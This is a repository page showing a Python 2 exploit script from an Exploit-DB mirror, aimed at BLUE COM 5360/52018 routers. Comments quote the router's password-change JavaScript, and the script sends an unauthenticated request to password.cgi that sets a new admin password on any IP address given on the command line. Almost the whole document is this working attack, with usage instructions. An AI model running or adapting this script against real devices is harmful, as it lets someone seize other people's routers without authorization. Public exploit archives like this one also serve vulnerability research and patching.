bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/31088.py
Offensive Security d63de06c7a DB: 2022-11-10 
2776 changes to exploits/shellcodes/ghdb
2022-11-10 16:39:50 +00:00

55 lines
No EOL
1.5 KiB
Python
Executable file
Raw Permalink Blame History

# Exploit Title: BLUE COM Router - 5360/52018 Password Reset Exploit
# Date: 20/1/2013
# Exploit Author: KAI (kaisai12)
# Home: CEH.VN
# Version: BCOM - 5360
# vulnerability - change password easy ! no protect !
#var loc = 'password.cgi?';
#switch ( idx ) {
# case 2:
# loc += 'sptPassword=' + encodeUrl(pwdNew.value);
# break;
# case 3:
# loc += 'usrPassword=' + encodeUrl(pwdNew.value);
# break;
# default:
# loc += 'sysPassword=' + encodeUrl(pwdNew.value);
# break;
# }
#
# var code = 'location="' + loc + '"';
# eval(code);
# }
#}
import urllib
import sys
def attackrouter(ip,password):
try:
params = urllib.urlencode({'sysPassword': str(password)})
f = urllib.urlopen("http://"+ip+"/password.cgi?%s" % params)
print "[+] IP: %s - Reset password: %s" % (ip,password)
return
except:
print "[-] error"
def main():
if len(sys.argv) > 2:
ip = sys.argv[1]
password = sys.argv[2]
print "--------------------------------------------------"
print "Router BCOM Exploit Execute Reset password modem "
print " author: KAI(CEH>VN) "
print "--------------------------------------------------"
print "[+] Sending exploit: OK"
attackrouter(ip,password)
else:
print "[-] Command error"
print "[-] Use:bluecomRT.py <ip> <password>"
if __name__ == '__main__':
main()
Reference in a new issue View git blame Copy permalink